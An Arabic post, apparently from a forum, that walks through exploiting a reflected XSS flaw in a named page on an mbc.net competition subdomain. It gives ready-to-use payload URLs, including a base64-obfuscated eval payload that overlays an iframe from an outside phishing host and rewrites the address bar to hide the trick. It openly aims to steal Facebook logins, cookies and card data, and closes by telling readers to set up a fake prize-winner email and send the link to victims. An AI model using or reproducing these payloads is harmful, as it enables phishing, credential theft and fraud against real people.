السلام عليكم

قبل فتره اكتشفت ثغره xss في موقع mbc.net على احد ال sub-domains

الثغره خطاء في كود javascript يمكن استغلاله لتنفيذ اي كود عبر ادراجه في url الموقع

الurl المصاب :

http://competition.mbc.net/resume/index_en.php?title=something

تلاحظ في مكان الtitle يمكنك ان تدخل اي نص ويتم عرضة لاكن عند ادخال كود جافاسكربت لايتم تنفيذه لان المتغير يستخدم "مباشره" كـ string ويتم دمجه في كود javascript لذالك يجب ان نغلق بقيه الstring باضافه

فاصله و علامة تنصيص

%27%20;alert("something");%20%27

فيكون ال url :

http://competition.mbc.net/resume/index_en.php?title=%27%20;alert(%22something%22);%20%27

يمكن استخدام الثغره في الاحتيال مثلا "ربحت جوائز من mbc.net الخ"

ولكي نخفي الاثر الرابط سنضيف كود javascript يقوم باخفاء ال url بعد دخول صفحه الاحتيال : window.history.pushState بالتحويل الى winner.php مثلا!

فيكون ال url الجديد: http://competition.mbc.net/resume/index_en.php?title=%27%20;alert(%22something%22);window.history.pushState(%27winner%27,%20%27winner%27,%20%27/winner.php%27);%20%27

وثم اكمال صفحه احتيال وادراجها عبر وسم ifreame

واخيراً اخفاء الكود عبر تشفيره الى base64 واستخدام الداله eval والداله atob لفك التشفير

طبعاً هذا الurl لصفحه الاحتيال لسحب بيانات حسابات facebook :

http://competition.mbc.net/resume/index_en.php?title=%27%20;eval(atob(%22JCgiKiIpLmh0bWwoIjxpZnJhbWUgd2lkdGg9XCIxMDAlXCIgaGVpZ2h0PVwiNDUwXCIgc2Nyb2xsaW5nPVwibm9cIiBmcmFtZWJvcmRlcj1cIm5vXCIgc3JjPVwiaHR0cDovL21iYy5hdHdlYnBhZ2VzLmNvbVwiPjwvaWZyYW1lPiIpO3dpbmRvdy5oaXN0b3J5LnB1c2hTdGF0ZSgnd2lubmVyJywgJ3dpbm5lcicsICcvd2lubmVyLnBocCcp%22));%20%27

يمكن استغلاله لسرقه ال Visa-card او سرقه الكوكيز الخ

اخيراً سجل حساب mbc-winners-2015@gmail.com وارسل الرابط url للضحايا . D: